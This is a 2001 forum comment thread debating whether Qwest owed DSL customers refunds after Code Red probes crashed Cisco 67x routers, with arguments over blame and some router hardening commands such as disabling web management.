It wasn't packet size, it was that CBOS (Cisco Broadband OS) versions earlier than 2.4 suffer the same vulnerability to specifically malformed URI's as IIS.

code red

[laslo2]

maybe if they *didn't run IIS*....

Re:code red

[jbrelie]

again I feel I must state that IIS didn't have ANYTHING to do with the outage. IIS only propagates the virus. Certain Cisco DSL routers (specifically the pre-cbos-2.4 types) get knocked offline due to the way the virus tries to infect other hosts. You could have Commodore64 plugged into the other end of a suceptible router, and you would still be affected by the Qwest outage.

Re:code red

But IIS is the reason it got into the network so if they didnt run IIS the virus would have been no effect to the host servers, but maybe to there busniess's running IIS that in turn would infect everyone else.

Excite@home

[crazyprogrammer]

Excite has a story about it here


I hope Excite@HOME customers don't demand refunds.

Damn

[banky]

I've never taken the time to write an angry post about the editorial content... but sheesh.

First, if you lost cablemodem service for almost a WEEK, WHILE BEING LIED TO about the cause, wouldn't you be a little mad? This was the case here in Fairfax. They tried to say it was "sheduled router upgrades", only to backpedal a couple days later after everyone figured it out (and they had to implore their users to patch, and their email system was down, etc etc).

Second, I guess I'm wacky, but if I pay for something, I want what I paid for, as other people have said here. I pay $45 a month for cable service. I don't call and complain if it goes out during a storm for a couple hours. But if its down for DAYS, their tech support line is TURNED OFF, and no one will tell me when it's coming back up, I expect to not have to pay for this service! I am not being given anything but a blinking data light. Some of us do not maintain multiple backup dial-up accounts; yes, I'll freely admin I'm spoiled by broadband, but at the same time, I can't justify spending $25 a month in case I lose my connection for a week.All the DSL providers in my area are dead or dying; roadrunner is my only option besides modeming (which is a bad scene in and of itself, die to "multiplexed lines" or some such nonsense which means I get 28.8 tops).

Third, if no one says anything and just rolls over, then the company will not be challenged to provide a high level of service, since they will know customers will just take it.

Sorry, Taco, but you're a helmet.

Re:Damn

[vandelais]

Are you going to sue your satellite provider when solar flares occur?
Are you going to sue the state if there is a traffic jam and you can't get to work on time? That's a service I pay for too.

Shit happens. Deal with it. and stop bitching.

Re:Damn

Uh, that makes no sense compared to what the other guy said. No, you don't sue your satellite provider because of a solar flare, they can't control that. Your internet provider can control whether or not they don't get off their lazy butts and get your connection fixed. It's your internet provider's fault when they lie to their customers about why their service is out and when it will be back on.

Re:Damn

[banky]

Solar flares are not the fault of the satellite provider.

Traffic jams are often not the fault of the state, but morons rubbernecking. The state, in nearly every case I can remember, mentions to me in advance when they're going to tear the roads up, so I can plan an alternate route.

Try again.

Re:Damn

[mashy]

Whether or not I agree with exactly what you said, I do believe there should bed some kind of lowered service price after this.
Now Cox Fairfax did ignore the problem until very late and I don't know whether or not they lied.. I don't want to start the argument again over whether or not ISPs should intervene but in the end out of this was the blocking of incoming port 80 connections to all customers. They claim they are enforcing something in their usage contract but I looked again and couldn't find a place that said servers were not allowed.

I feel that I am no longer paying for full use of my IP and I wasn't even a contributor to the problem! I think all customers should be given a reduced service price, not necessarily for downtime but for the real long term effects of the reaction to Code Red.

Re:Damn

Huh?

The article was about Qwest's DSL, not some cablemodem ISP. There is a difference...

Re:Damn

[dillon_rinker]

The state promises you nothing. The state can't be sued for breach of contract, fraud, or negligence, even if they decide to tear up every road they own. Of course, you can vote the bums out of office, but that's a little different from suing them.

Stuff happens. Pick your battles. Win them and you won't have anything to complain about.

Re:Damn

[fishbowl]

>Traffic jams are often not the fault of the
>state, but morons rubbernecking.

You can't really compare public roadways
to privately owned telecommunications.

Re:Damn

But if its down for DAYS, their tech support line is TURNED OFF, and no one will tell me when it's coming back up, I expect to not have to pay for this service

So once you found out that you weren't going to get a refund you cancelled, right?

Re:Damn

[alcmena]

Not to poke holes, but that doesn't make a lot of sense. After all, it was their customers who were infected with the Code Red virus that caused the problem in the first place. Reducing the price to the very people who caused the problem just sounds odd to me.

Re:Damn

[Dot+Com+Drew]

I think he just did.

Re:Damn

[Danse]

They may be able to make a case if the customer was infected. But what if they weren't? Either way, they still lied to their customers and the service was still down for a WEEK.

Re:Damn

[Danse]

Why would he do that? There is no other comparable service available. One vendor. One choice if you want broadband. Just because they're the only vendor doesn't mean they should be allowed to get off so easy. They failed to provide service for a week. Why should customers have to pay for a month of service when they only received 3 weeks worth? I wouldn't cancel. I'd pursue the matter til it gets resolved. If I get stonewalled somewhere along the line, I'd make sure it makes the news (they love this sort of stuff). Perhaps get my rep involved. There are options.

Re:Damn

[mashy]

It makes sense becuase in the end they limited our service with the http block.

Re:Damn

[dhamsaic]

amen brotha. i have both cox roadrunner and verizon dsl in fairfax. while my cable was wigging out, i bought a second router, hooked it up to the dsl and it worked fine the entire time. i think cable's working again but i dunno. agreed, we were lied to on the phone by roadrunner reps. i had my cable modem unplugged from everything while she was telling me "it must be your computer, i can ping your modem just fine..." - "are you sure it's mine and not someone else's?" - "oh yes, i'm definitely pinging yours and it's working fine..." uhhhh... riiiiiiiiight.

anyway, where you at in fairfax? i'm right near the high school. mmmm, china gourmet. did you know that think geek is situated in fairfax too?

Refund or Service.

[Faux_Pseudo]

Lets see, a few hundred refunds of $5 a peice which the service contract does not require, OR the knowledge that you will only loose a handfull of customres because broadband is a monoply.
Oh an option number 3: Be a pissed off customer and complain you want your $5 in this time of economic uncertanty for broadband companies and if enough other people do it the company is unable to pay its bills and you are left with no service at all.

Lets just say that when my nntp connection goes down with @home for a few hours each month I do not call demanding a refund.

Re:Refund or Service.

I think most of the complaints tend to come from people who don't have a realistic understanding of bandwidth costs.

Re:Refund or Service.

Or Option 4: Be a pissed off customer and complain you want your $5 back. Bitch louder than the rest and get your $5 back, while everyone else gets screwed over.

Re:Refund or Service.

[tester13]

Are you saying that I should be looking out for Qwest's interests? Maybe we should take your suggestion a step further and all give them pay-pal donations. Seriously, if the company can not provide a service they should not charge you for said service. That is called stealing!

Re:Refund or Service.

[WNight]

If an ISP can't afford to provide the bandwidth they contracted to provide, they should charge more or provide less (after notifying customers).

I know of many ISPs that cap customers, either in momentary bandwidth (ie, speed caps) or in total bandwidth, or both, where the speed cap drops lower, the more you've downloaded.

This way that can afford their backbone costs and provide service to everyone without letting a few people use up a T3.

The reason QWest is providing unlimited bandwidth is so that they can drive all the competition out of business. Monopolistic practices.

And we're supposed to go easy on them when they don't provide what they contract to provide?

Do you think the board of QWest is sitting around, discussing overdue bills, saying "We don't have a realistic understanding of living on one wage and supporting children, so we should let these people slide a month" or do they automatically forward all overdue bills to collection, thus ruining your credit rating?

I might be prepared to cut them some slack if 1) they'd ever return the favor and 2) they we're monopolistic jerks trying to run everyone else out of business.

From an affected party

[jbrelie]

I will grant that they were probably pretty busy during all this so I could understand the 2 and 3 hour wait times. I wasn't really expecting techs to be able to help me anyway. ("poorly trained" was a really NICE way of putting it.)
I just don't think that Qwest was proactive enough in coming to a solution. They tossed out "patches" and "quick-fixes" without really testing them. I just think that the whole issue could have been resolved much faster than it was. They *should* be handing out refunds, but they never will. I for one am looking into new ISP alternatives. This is not the first time my company has gotten screwed by Qwest.

Re:Did I miss something?

[jeffy124]

ok, thanks for the info. The thing I heard was simply a rumor from a co-worker who thought that because the packet containing the http GET request was considerably large, it potentially caused problems on some routers (Maybe he thought the malformed URI meant the packet was bloated or something) It sounded a little fishy to me because the concept of spliting packets up during their trip has been commonplace among routing systems long before the internet tookoff in the early 90s.

Problem Solved

[Rogain]

You sue your ISP,
then your dumb Microsoft product using ISP sues microsoft,
Microsft disappears into the blackhole created by the massive gravitational effect caused by so many money-hungry lawyers rushing to Redmond to jockey for position at the trough.

Lets see, microsft disappears and we lose the lawyers, perhaps human civilization might have a change to survive afterall

Re:Did I miss something?

[Enigma2175]

My cable was down for 12 hours during a storm, would they prorate my bill and take off 1/60th or 1/62nd of the bill?

Yes. At least with AT&T@home the Tech Support people are authorized to give refunds for outages. At least that was the way it was when I worked there.

Re:Did I miss something?

[figment]

The configuration webserver on the Cisco 675 had serious DOS problems in the setups that various dsl providers were providing (i think it had to be in bridging mode or something), which were known even prior to the CodeRed problem. Essentially, if you did a getrequest with too much crap in it, it crashed.

It hit bugtraq a few months ago, while cisco was fairly responsive and issued a patch, Qwest at that time declared that patch unsupported.

Who's really to blame?

[brad3378]

Seems to me that if an ISP is going to be held responsible for this type of problem, then shouldn't Microsoft be responsible as well? After all, ISPs are customers of the company with the flawed software.

I have to wonder what the implications for responsibility would be if they were using open source code instead.

Reminds me of the whole Ford/Firestone fiasco.
Anybody who's ever blown a tire would know that you shouldn't get into an accident unless you do something stupid. (Car&Driver verified this with an elaborate road test). Ford and Firestone have to blame each other to avoid directly calling their customers idiots. (just for the record, I drive a Ford, so flame away ;-)

Anyway, to get back on topic, this is a classic case of blaming the "fall guy" because it's too tough to go after the real problem.


Flame Away!

Re:Who's really to blame?

[jbrelie]

Dude... Nobody is dying over this.

hypocrites

[jayhawk88]

I wonder what all these customers reactions would be if their ISP tried to bill them extra every time they clicked on a SirCam attachment and sent 5 gig worth of pr0n, resumes, and book reports through the mail servers? Shit happens people; unless you got an uptime agreement with your ISP, live with it.

Using Microsoft in infrastructure?

[chaoskitty]

Any company stupid enough to use Microsoft products in their infrastructure should not expect others to simply accept downtime as a result of this stupidity.

If my line went down because the people that run my ISP are inept, I would DEMAND a refund of the time that it was down. If I had an option, I'd switch ISPs.

Honest accidents, or causes like weather, are understandable. Large tech companies that have extensive tech staff running Microsoft products is unexcusable.

Re:Using Microsoft in infrastructure?

[reddeno]

They aren't using Microsoft products, they're using Cisco products. Dolt.

What is temporary

[Catskul]

So what happens if you are without service for a day, a week, a month? Does that count as temporary? This is a very gray area they could have a chance of getting the law on their side.

Re:What is temporary

[Trepidity]

Yeah, this is still a really gray area. On the one hand, one can hardly expect an ISP to give you say a $0.50 refund every time the system is down for 6 hours. But on the other hand, what if it's an extreme case, and the system is down for the entire month? Surely you can't be expected to pay your monthly fee if you didn't get any service at all. So what about the cases in between?

The only time I can think of that this became a legal issue was with AOL downtime and limited availability in early 1997 as they were switching from 20 hours a month free access to completely unmetered access. But they settled that by offering refunds (in the form of rebates on the next month's fee).

Re:What is temporary

[Anne_Nonymous]

> a $0.50 refund every time the system is down for 6 hours

CodeRed probably cost me less than $5.00 of actual service down time. The real cost as I see it was the time wasted enduring, diagnosing, and fixing the problem. Unfortunately, the cost of my lost time and productivity was much higher than $5.00.

I don't expect Qwest to pay either of these amounts, but just want to point out the real costs to the consumer.

I was hit...

[doorbot.com]

...by the Code Red virus. A few entries in Apache's access_log but I didn't go down (nor did my PacBell DSL line). But I think I'll sue all of Qwest's customers (or maybe just the ones suing Qwest) for attempting to attack my system. That's cyber-terrorism, no? They should've been patched and my guess is a bunch of those morons were propogating the worm further. Who knows, maybe Qwest targetted some of their customers specifically who they thought (legitimately or not) were further propogating the worm.

Re:I was hit...

[jbrelie]

It wasn't Qwest DSL routers that attacked your system dumbass. It was unpatched IIS servers that did. DSL routers only get kicked offline when Code Red tries to infect them the way they would an NT IIS server. And that was even a side effect of the virus.
Do your homework.

Re:I was hit...

[doorbot.com]

No kidding. I am in awe of your astounding intellect. Please, bestow onto me your infinite wisdom, oh wise one.

How many of those Qwest customers had PWS (IIS) installed because they have no fucking clue what the hell they're doing? Probably just as many people who are demanding money back from Qwest.

Do your homework.

I did, are you the who's going to correct it?

Don't jump to conclusions, it's a lonely place.

Re:I was hit...

[jbrelie]

Well please forgive me then. In your first post you certainly made it sound like you were pointing the finger at Qwest DSL customers. The attacks can come from any computer on the net. running IIS. The whole confusion over the IIS issue vs. the DSL router issue has caused me no end of grief... most of it coming from my own users. Sorry bout that.

Re:Does anybody else...

[sigwinch]

Dammit. That didn't do what I hope it'd do. Sorry for the noise.

Financial priorities

[the_rev_matt]

Qwest has more important financial priorities. Such as paying Joe and Sol (the two most hated men in Colorado by a long shot) hundreds of millions of dollars in bonuses this past year (despite the stock being down by 50%). I wonder how much bonus they'd have gotten if the company had performed well?

as we are (slowly) learning, when you deal with a monopoly such as {telco/cable co/power co/water co/etc} you pays your money and you takes your chances. They promise minimal service and maximum hassle in exchange for as much of your money as they can squeeze out of you. I'm far less concerned about the business practices of Microsoft, where there are options ad nauseum, than I am about true officially sanctioned monopolies such as those listed above, which are basic necessities (well, cable isn't since cable isn't a necessity).

Re:Financial priorities

"It's the privatization, stupid."

This is why this sort of thing, ie a service that is universally required, should be government-run and provided to the public at cost. Private companies that provide these services inevitably sacrifice quality of service for short-term profit. That profit is better spent on engineering goals.

Darryl.
(Where did my account go? Grr ...)

Say it three times

DSL is not a commercial-grade service.
DSL is not a commercial-grade service.
DSL is not a commercial-grade service.

If you have a business that needs 24x7 connectivity with a rapid response in the event of a failure, get a T1 line, or at least an ISDN line. If you're relying on a DSL (or cable) connection as a lifeline for your business, you're relying on the wrong technology.

The guy said he lost $5000 in business due to the outage. If his internet connection is worth that much in business over just a few days, he should have invested more than $50 a month in it.

Re:Say it three times

You don't know what the hell you are talking about!
You don't know what the hell you are talking about!
You don't know what the hell you are talking about!

Beside the fact that telcos provide many T1 circuits via DSL, the Qwest Code Red denial of service had nothing to do with the physical layer circuits. At no time was there a problem with physical layer connectivity during the Code Red outages, it was a problem in software layers independent of the WAN technology. If a router with a T1 interface had been using the same built-in HTTP server code as that in the Cisco 67x's that were affected by Code Red probes, then it too would have been dead in the water.

DSL is a perfectly adequate technology for commercial-grade service -- or at least as adequate as T1. In neither case should you make your entire business dependent upon a single circuit from a single provider.

Re:Say it three times

[c-A-d]

DSL is not a commercial-grade service.
Thank GOD I live in the most connected society in the world - Canada.

Here is B.C., DSL is a commercial-grade service. They sell it as such, and the CRTC makes damn sure they provide a commercial-grade service.

Joe Average wants service for dollars...

[mystery_bowler]

Reason being, the average home user probably isn't going to care about (or even understand) whatever caused the problem at the ISP. All the average consumer knows is that they paid X amount of dollars for an always-on connection that suddenly wasn't on. Should my DSL provider suddenly go down and claim it was Code Red, I'd be upset, but being someone who has at least a little understanding of the nature of networking, I'd be a little understanding (especially if the connection was back up quickly).

I'd imagine that as these types of weaknesses become more exploited, ISPs/DSL providers will have no choice but to try and do business with systems that are increasingly less vulnerable to attacks, because the defense of "it wasn't our fault, our routers/servers were exploited" probably won't hold up to their customers.

Well it would depend.

[ioman1]

How long was the average user down? It might justify asking for a refund if the ammount was large enough.

Depends on your usage...

[Evil+Oli]

I am all too familiar with the tricky 'agreements' they make you sign before getting broadband service. They are typefied by fairly sketchy and vague descriptions of how good the service will be.

However, they do make certain guarantees of the service, and let's face it - their job is to keep the system working, whether it be Code Red virus, or scheduled repairs. Home users who lost a lot of time due to this should be compensated for the loss.

On the other hand, people using DSL for business purposes should know better. I've had clients complaining "why has my cable been down for a week... I'm using this for a business!!!".

Cheapskates like this deserve downtime. DSL and cable are not mature enough products (esp. DSL) to warrant business use. It is cheap, and that attracts a lot of people, but it just doesn't have the stability businesses need.

Learn a lesson or two... if you're entrusting your ENTIRE business to online presence or connectivity, spend a bit of money and get at least an ISDN connection. You have to spend money to make money. Frankly I don't know why people rely on the internet so much anyway. It is a *convenience*, not a staple.

ANALOGY

Blaming Qwest for loss of service because of Code Red is roughly the same as blaming the state of california becuase your house fell into the San Andreas fault.

Re:ANALOGY

[The_Messenger]

Blaming Qwest for loss of service because of Code Red is roughly the same as blaming the state of california becuase your house fell into the San Andreas fault.

Never underestimate Johnnie Cochran.

What's the problem?!

Okay, So let's say you poor folks got slammed by ISP's in the states (hahaha.. my Canadian DSL provider just laughed through it!) with a few hours of downtime..

1) Check your contract carefully.

2) Check your Contract carefully.

3) Whine some more. Then, Check your contract carefully.

4) Consider: Is this "internet thing" end-to-end deliverable, in terms of ANY kind of guarantee? Put this in comparison with a contract that might state: Yah, your local loop is guaranteed to be up, 99% of the month..

Stop your whining. Fess up. Pay your cash for what you get. 56k!? I did grow up using a C64 and 300bps modumb. Coddled. That's what you are, in an UNREGULATED communications medium.

REGULATE it, and it'll be reliable. leave it UNREGULATED, and we're stuck with occasional delays.

Cheers,

Canuck boy.

Re:What's the problem?!

[QuaZar666]

exactly. people should have backup plans in case something is done. Lots of companys have down time and they live with it because they have backup plans to deal with it. I work in the computer industry but I have backups plans in case something fails. there is always a phone and pen and paper. if you dont have that then find them and use them when all else fails.

Qua

Please quit giving software subs mindshare please.

[raretek]

As long as it remains unthinkable, it will be.

Qwest was negligent

1. The HTTP server in the Cisco 67x's was vulnerable to Code Red -- it didn't get infected like the intended IIS targets, the router just croaked as a side-effect of the Code Red probe.
2. Qwest didn't routinely use the HTTP server for remote router management, nor did they recommend that their users do so -- it was just a lightly documented option in the back of the supplied user documentation.
3. Even though it wasn't being used, Qwest left the HTTP server enabled and configured to accept connections on the WAN port of the router.
4. Cisco made specific provisions in the 67x series for easy ISP default configuration customization; Qwest didn't take advantage of them.

Conclusion: Qwest was negligent in needlessly exposing its users to HTTP server flaws, and deserves to pay for not following accepted security procedures -- i.e., turn off all unused network services.

Re:Qwest was negligent

[Ungrounded+Lightning]

3.Even though it wasn't being used, Qwest left the HTTP server enabled and configured to accept connections on the WAN port of the router.

Actually, with that version of the Cisco firmware the router would crash due to Code Red's probe packets even if the port was disabled.

If Qwest was negligent it was because they didn't upgrade the firmware in the routers they supplied, and didn't provide the users with a notification of the need to upgrade and a convenient way to do so.

Re:Qwest was negligent

Actually, with that version of the Cisco firmware the router would crash due to Code Red's probe packets even if the port was disabled.

Could I see some evidence for this claim? The tech notes that I have seen from Cisco all say that Web Management must be enabled for the router to be vulnerable. Additionally, to date Qwest still does not recommend a CBOS upgrade for its Washington DSL users, but specifies a procedure that disables Web Management and changes its port number. I never changed the port number, but one of the first things I did to my 678 was to turn off Web Management and any WAN-side access to other management services. Code Red never affected my router.

Re:Qwest was negligent

[VB]

Wrong on both.

Cisco was negligent. They didn't give Qwest the proper firmware for the routers they sold Qwest customers. 675, or 678s. Trust me. I toasted one of them and turned it into a door-stop. Qwest took the unit and gave me a new one. Probably RMA-ed it at Cisco's expense.

Disabling the port isn't enough.

cbos#set web disabled
cbos#set nat entry add 10.0.0.2

Problem solved. (You might want to write that.)

Cisco up for 34 days, 10:15:12.60.

CBOS (tm) 678 Software (C678-I-M), Version v2.3.5.012
Clearly I haven't patched. Keep in mind remote syslog is enabled, so testing the veracity of my cisco's configuration might be legally problematic. If anyone tries to kill my router, it's without authorization and will be logged. The router will survive it and the syslog server will record it and I will report it. Sorry for the disclaimer, but it needs to be there. >:)

Clearly Code Red hasn't killed my router. I am typing this from my DSL connection.

Peace.

Re:Qwest was negligent

[Ungrounded+Lightning]

Actually, with that version of the Cisco firmware the router would crash due to Code Red's probe packets even if the port was disabled.

Could I see some evidence for this claim?

I'm just quoting something I found on another site. Unfortunately, I was unable to find it again with about 10 minutes of web searching.

Sorry. (If I run across it again I'll post a followup.)

Re:Qwest was negligent

[Alex+Belits]

I have seen that. Disabling HTTP and filtering out TCP to port 80 at the router still did not fix the problem -- apparently listening at the HTTP port can't be disabled, and filters don't affect the broken piece of code.

Re:Qwest was negligent

[Alex+Belits]

Great! ;-)

The problem is, that leaves you behind NAT, and people with "business" DSL service have bunches of servers behind their routers.

Re:Qwest was negligent

[VB]

NAT can be implemented trivially to each of the "business" ip's behind that router directly to the firewall which will route it appropriately.

This isn't rocket science. NAT each of the public IP's to the same firewall machine and set up the rules to redirect to the private servers as appropriate. Done.

BTW, this is a business network. I just threw out a simple rule for the 99.9% user. Tweaking it is like eating popcorn.

Re:Qwest was negligent

No, right on both. You can find the Cisco tech note at www.cisco.com/warp/public/707/CBOS-multiple.shtml, the relevant part being:

Alternatively, disabling the Web access completely will also prevent this vulnerability from being exploited. This can be done by entering the following command while in enable mode:

cbos# set web disabled

You can find Qwest's current recommendations to Washington DSL custoomers at http://www.qwest.com/dsl/customerservice/downloads /Red_Virus_Patch.pdf

If you are trying to argue that these two documents are incorrect, then I would like to see a bit more than an anecdotal "I did this to make sure Code Red wouldn't affect me," because I did considerably less and also remained unaffected. I disabled web access to my 678 the day I got it from Qwest -- long before Code Red. I haven't upgraded the firmware, changed the web server port number, or re-jiggered NAT.

That says to me that if Qwest had followed accepted procedure and disabled the unused service in the default configuration supplied to customers, then the problem of infinitely looped DSL routers never would have surfaced in the first place.

Re:Qwest was negligent

[zulux]

I'm a Qwest customer and have and old version of the operating system and havent had a lock up. The secret is to have it forward port 80 into an internal ip address. You have around 10 slots in the system for use for forwarding, or you can have all packets forwarded to a particular ip - kinda like bridging mode, but you get a non routable ip address.

Unbelieveable....

[Lumpy]

It takes all types, and obviously comuters and the internet are now rife with the types of the clueless. (Ok, I know, that ain't a news flash by any means) First off the TOS with any isp states that they are responsible for nothing, and if something happens that is not of their doing that interrupts your service then tough cookies. This is like asking the Cable company to refund your money because while your power was out you couldn't watch tv! or demanding a refund from the phone company because you couldnt use your phone while your house was burning down.

Unfortunatly, the courts will either help these "poor" users. or it will be swept under the table.
I just wish for once we'd get a judge that would publically announce that the plaintiffs in a friviouls lawsuit were morons and idiots... but then that'll bring more friviolus lawsuits... and so starts the spiral downward...

If this case is won by the users.... when can we sue microsoft for all the lost productivity their operating system causes weekly?

Re:Unbelieveable....

[terrymr]

ahhh but you forget that it wasn't the ISP which was failing it was the telco supplied equipment. I'm required to have a cisco 678 because it's the only external router approved for use on Qwests system - and if this thing has an inherent problem then I expect something to be done about it.

If equipment supplied by your telco causes your service to fail then you are entitled to a refund.

Shouldn't..

[RainbowSix]

... their target be Microsoft or the creater of the virus? This is just as frivilous as suing mp3.com for allowing users to copy artist's work.

Isn't this like my non-use of MS software refund?

[mugamba]

I have to accept paying for the pre-installed OS that I wiped clean, waste my time loading Linux the way I want, and then throw the still-shrink-wrapped software in the trash. I don't peel the stupid Microsoft Windows license sticker glued to my new machine and mail it back to either the manufacturer OR Microsoft. I deal with it.
This virus outage complaint is the EXACT same thing. I don't ask for a refund because my modem light is glowing, even though I have no systems on, nor when my Apache logs are filled to the brim, nor when it takes five to ten minutes to check my mail due to the latency.
It is part of life. Sorry. Get over it.

Doing what they need to do.

[pjbass]

One thing people need to realize is that when someone pays for a service, DSL or any other type of net connection, they are paying for a service. They are not "purchasing" the lines, they are essentially "renting" the use of the lines. Qwest should not be held responsible, neither should any other ISP for that matter, for users who unfortunately didn't know better to patch their machines. The only way I think ANY ISP should be held accountable is if THEIR machines caused the outage or decrease in service.

I also wanted to address the business of AT&T, as well as many other smaller ISP's, blocking port 80. This again is a measure taken by AT&T, who by contract holds the discretion and right to do with their service as they see fit. If they had in their contract that they MUST provide access to port 80, then people have something to go after them for. I'm not saying that this was "right" or anything. It sucks. But AT&T and others took the proactive approach (as proactive as possible) to stop the spread of this worm, and to save their bandwidth, so they WOULDN'T have a complete outage.

If an ISP doesn't cut the worm off at the source, how is the ISP supposed to defend itself? I think the people who should be approached are the ones who left their machines open for infection, and then saying "I'm not infected" when people start talking about all the infected machines.

but what about...

I have not experienced loss of service, but it's all the big ass ISPs that I'm getting hit the most by. I've gotten just a hair under 30,000 Code Red/II attempts since July 19th between the two domains I host. Both servers were salvaged PPro 200's with relatively small hard drives. Having 99% capacity in /var is not good, as before CR, it topped out at 20%. Thanks to lazy admins and lazy ISPs that refuse to discipline their offending customers, I'm running out of drive space.

My company being a small company, there's not always $$$ to throw around for upgrades.

Anyway, at last count, AOL customers alone (*.aol.com) had over 4,000 attempts, and AOL's PROXIES for god sake tried a few hundred. I'll grep for qwest tomorrow. But why should *I* suffer for not installing inferior software? I don't get it.

Microsoft should be providing the refund

[splaytree]

See subject

Re:Microsoft should be providing the refund

[The_Messenger]

Microsoft would probably just offer everyone a free month of MSN Internet connectivity. :-)

Re:Microsoft should be providing the refund

[Phroggy]

Microsoft would probably just offer everyone a free month of MSN Internet connectivity. :-)

Actually, qwest.net is being sold to MSN.

Re:Microsoft should be providing the refund

[WildBeast]

Dude, with that kind of thinking you should work for Microsoft :)

brick & mortar buisnesses

[NevarMore]

I agree with Qwest. They shouldn't have to pay.

What happens if a road/bridge is closed because of a flood. A buisness on the other side looses customers for that day because customers are either unable to navigate an alternate route or no other route exists. Does this give the buisness the right to sue the transpotation department because it was unable to clear the flood?

The flood wasnt caused by the road crews, exactly like Code Red was not caused by Qwest. The hypothetical road crews placed signs and closed roads to prevent further damages to roads and drivers, much like Qwest notifying its customers of the damage and telling them how to fix and prevent further problems.

Most insurance companies often do not fully insure against damages caused by 'Acts of god'. They do this because these events are uncontrollable and unpredictable much like a large scale internet virus. How is damage to the internet by an act of god different to damage caused by an act of god in the real world?

get money back?

[sean23007]

Getting any kind of refund from Qwest for a lack of service for any amount of time (even a ridiculously extended period) seems to me to be impossible. I use Qwest for my DSL service, and I was out of service for the months between and including November of last year and April of this one. These five months not only lacked broadband service, but they continued to extract a monthly charge despite my numerous angry exchanges with the technical support and the sales staff. I finally paid the fellows at the local station a less-than-friendly visit and made brutally clear to them how I felt about the whole affair. Needless to say, the matter was sorted out quickly and easily in my presence, and since I have enjoyed virtually constant DSL service from the good folks at Qwest (unfortunately, however, I am getting 30% or less of my allotted downstream bandwidth, a very disappointing circumstance considering my ever-increasing home networking situation). Although, the good folks at Qwest are not so reasonable. That is to say they are about as reasonable as they are competent. In spite of the fact that I had exactly zero service for a period of no less than five months, and had continued to be charged the hefty sum of $30 a month throughout, Qwest refused and continues to refuse a refund of any kind, much less the full deserved amount lost of approx. $150, if I have done that math correctly (and I think it is unquestionable that I have).

All in all, I wouldn't expect any money back or the minor infraction caused by Code Red. It barely affected the modem itself, and it took about two seconds to make the modem completely invulnerable to such an attack again, even before consulting the Qwest support page or people.

Qwest are slime!

[Blue+Neon+Head]

I guess it comes with being a telco and being used to screwing customers over, but Qwest are seasoned pros. It has become customary for them to try to sneak extra charges on my bill anytime I order anything from them (which I avoid when at all possible now). Currently, I am trying to get my ISP switched from Qwest.net to another local service provider. I was quoted Aug. 15 at 5 PM for the switchover. A few days after this, I realized I had not been switched and called to complain; they told me the switchover would be today (Aug. 22) at 5! Right now, it's 9, and I just called support, asking why I wasn't switched, and they had NO such switchover on file at all. Next stop is the Better Business Bureau and the Public Utilities Commission ...

Give no apologies...

[SkullOne]

Qwest doesnt owe these customers any sort of refund. The issue was largely out of Qwest's control, and thefore
should be faulted to the wild nature of the internet.

Although, I dont see why Qwest was hit so hard by this, it does seem a bit odd, a weak infrastructure maybe.

There were public announcements on how to fix the DSL modem crashing problem during the whole Codered crisis, you would
have to be blind, deaf, and dumb not to head the encouragements to upgrade the firmware on the Cisco device, or to disable the web interface.

Business Relys on the Internet

[transami]

We were down fo three weeks. The first week due to an administrative oversite on Qwests end. And the next two because of Red Code. Moreover numerous hours of my time were spent dealing with it. Add those costs up and we're into the $500 range. I don't think I should have to pay my $80 for this month either! Moreover from point of view, Qwest did a poor job of dealing with the problem.

Want to Sue? Sue Microsoft!

[mr]

1) they have money.
2) If you are runnng, oh say unix, you didn't agree to their licence.
3) Their shoddy product is unsafe on the information superhighway, and create unsafe conditions for the others.

Microsoft has had staffers and employees state the goal is to push out new product, andding features over 'good code' or fixing old bugs. You might just get #3 to stick.

All you have to do is get a jury to buy #3. The lawyers will like 1 and 2.

The problem was their network

[crimoid]

Although many people were hit with the virus, the problem that I had was that Qwest's network just crapped out. My modem was patched right away and wasn't even being hit yet I was loosing packets left and right. Hell I couldn't even get to routers and servers inside the Qwest network at times. Blaming the virus is one thing, but having such a fragile network is shameful. I hopped on Earthlink at a friend's house and it was plenty fast. Hmm? Perhaps Code Red doesn't target Earthlink customers.

Not Just Qwest

[VirginiaGYNot]

I tell you what, I pay for my DSL Service. I don't use Microsoft products, and there was no reason to shut down port 80 on my web server. I use NAT and my web server is on a LAN behind my DSL gateway. I spent about 4 hours trying to figure out what was going on.

When I figured it out, I called Verizon tech support and they told me they had put a network wide block on port 80. I pointed out to them that obviously their web servers weren't hampered by that block.

Verizon's respond, "I'm sorry, there's nothing we can do."

Unacceptable, and yes, I would like a partial refund for the 4 days my web site was down.

Where are the tobacco lawyers?

*They* would know who to sue - micro$oft! Now's
the time to prove shrink-wrap disclaimers aren't enforcable.

This will lead to subscription software?

[Benjiman+McFree]

I think you've allready missed the boat comrad. It's allready happening! What exactely is the RedHat Network and xiniam about?

The sad thing is, it's not sad at all. You can have your cake and eat it too {in the digital wold that is, hehee}

--Prepare yourself, the dark forces may strike.

Re:This will lead to subscription software?

Every Picture tells a story, don't it.

Comparison...

[grimmy]

I'm sorry but saying that the qwest users deserve a refund is like saying the guy who drives the only taxi in a small town should be sued because his cab was stolen and someone had to walk 3 blocks to the store.

Sure it is an inconvienience to them, I've had my cable go down for 2 days and it was a pain in the ass. Did I ask for a refund? Nope, you know why? Someone STOLE the cable. Ya it's dumb in their part for not haveing backups and the cable being exposed, but it's still not something they could have knowingly prevented.

Re:Comparison...

Your comparison really sucks:
1) The cab driver doesn't HAVE to provide the service, it's not like there's a contract. If for example a limousine driver had a contract to pick someone up at the airport, and didn't do it because the limo was stolen, they would refund the money no questions asked.
2) The cab driver, whose cab is stolen, isn't in the middle of providing a service. If the cab were carjacked while driving someone, I would bet that the passengers wouldn't pay the fare, and the cabby wouldn't expect it.

Re:The Truth About CmdrTaco, VA, and Microsoft

[jchristopher]

Mod parent to "+5, funny".

A credit, they gave me one

I received a credit for the 36+ hours my DSL (here in MN) was actually down. So I dont really have any complaints. The real problem here, was that for the first several days they were telling every one that all you had to do was "set web disable" (which I already had in my setup) to protect your cisco 67x from code red.

My problems started on friday and I tracked down the info about setting the web configuration to another port on my own. I even sent several emails to qwest tech. support in addition to telling several of their support people how to fix their problems. It wasn't until monday that they started telling people to change the web management port.

And yes their wait times were 100+ mins for days.

I hate to say it,

[The_Messenger]

but I'm starting to agree with Gibson. Imagine how much worse the flood would have been if NT5 had the power of real sockets.

Re:I hate to say it,

[Sadfsdaf]

Heh, they already do, windows 2000 already has RAW sockets! Even your lovely Gibson's page states it! http://grc.com/dos/xpsummary.htm, and i quote-

The security features built into all other raw socket capable operating systems (Windows 2000, Unix, Linux, etc.) deliberately restrict raw socket access....

